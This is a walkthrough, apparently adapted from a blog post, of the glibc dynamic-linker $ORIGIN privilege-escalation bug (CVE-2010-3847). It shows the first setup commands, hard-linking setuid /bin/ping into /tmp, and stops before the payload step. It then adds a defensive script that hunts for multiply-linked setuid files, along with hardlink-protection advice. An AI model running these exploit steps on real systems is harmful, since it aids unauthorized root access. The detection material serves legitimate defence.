Linux glibc (ld.so) vulnerability: an ordinary user gains root privileges
*This content is adapted from another author's blog post*
Crushlinux has tested this on RHEL 5.5 (32-bit)
Principle: The GNU C library dynamic linker expands $ORIGIN in setuid library search path (CVE-2010-3847). $ORIGIN stands for the directory that contains the executable being run; the bug is that the vulnerable ld.so still expands it for a setuid program, so an unprivileged user who can put a second name for a setuid binary into a directory they control also controls where a library is loaded from. The bug is in glibc's dynamic linker, not in gcc; gcc is only used to build the payload library.
1. Create an ordinary test user:
[root@crushlinux4 ~]# useradd test
[root@crushlinux4 ~]# passwd test
Changing password for user test.
New UNIX password:
BAD PASSWORD: it is too short
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
2. Switch to that user (note that it cannot run privileged tools such as useradd):
[root@crushlinux4 ~]# su - test
[test@crushlinux4 ~]$ whoami
test
[test@crushlinux4 ~]$ useradd user1
-bash: useradd: command not found
3. Begin the privilege escalation
A hard link is a second name for the same inode, so /tmp/exploit/target is still the setuid /bin/ping binary, now sitting in a directory the test user owns (this requires /tmp and /bin to be on the same filesystem, since hard links cannot cross filesystems). Opening it on file descriptor 3 keeps a handle to that inode for the rest of the exploit.
[test@crushlinux4 ~]$ mkdir /tmp/exploit
[test@crushlinux4 ~]$ ln /bin/ping /tmp/exploit/target
[test@crushlinux4 ~]$ exec 3< /tmp/exploit/target
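The hard-link step above is the footprint a defender can look for: a setuid binary that has more than one hard link, especially one under /tmp or another world-writable directory, should not exist on a healthy system. The following script is an added example and is not part of the original post or of Crushlinux's procedure; it assumes a POSIX find (the -perm, -links and -xdev predicates are standard) and reads the fs.protected_hardlinks sysctl, which has existed since Linux 3.6 and, when set to 1, stops unprivileged users from hard-linking files they do not own, which blocks the ln step entirely.

```shell
#!/bin/sh
# Added example (not from the original post): hunt for the artefact the
# $ORIGIN technique leaves behind, a setuid file with a second hard link,
# and report whether the kernel knob that blocks that step is enabled.
# Run as root for a full sweep; as an unprivileged user only directories
# you can read are inspected (errors are silenced).

# Print every regular setuid file under the given directory (not crossing
# into other filesystems) whose link count is greater than one.
find_multilink_setuid() {
    find "$1" -xdev -type f -perm -4000 -links +1 2>/dev/null
}

# Print the value of fs.protected_hardlinks (0 = off, 1 = on), or
# "unavailable" on kernels older than 3.6 that do not have the knob.
hardlink_protection_state() {
    if [ -r /proc/sys/fs/protected_hardlinks ]; then
        cat /proc/sys/fs/protected_hardlinks
    else
        echo unavailable
    fi
}

# Usage: sweep the usual attacker-writable locations plus the home directories,
# then check the sysctl. Any path printed by the sweep deserves a look.
#   for d in /tmp /var/tmp /dev/shm /home; do find_multilink_setuid "$d"; done
#   hardlink_protection_state
```

On a system where the knob reads 0 or "unavailable", mounting /tmp, /var/tmp and /home on their own filesystems is the classic mitigation, because the ln in step 3 then fails with a cross-device link error before any library search path is involved.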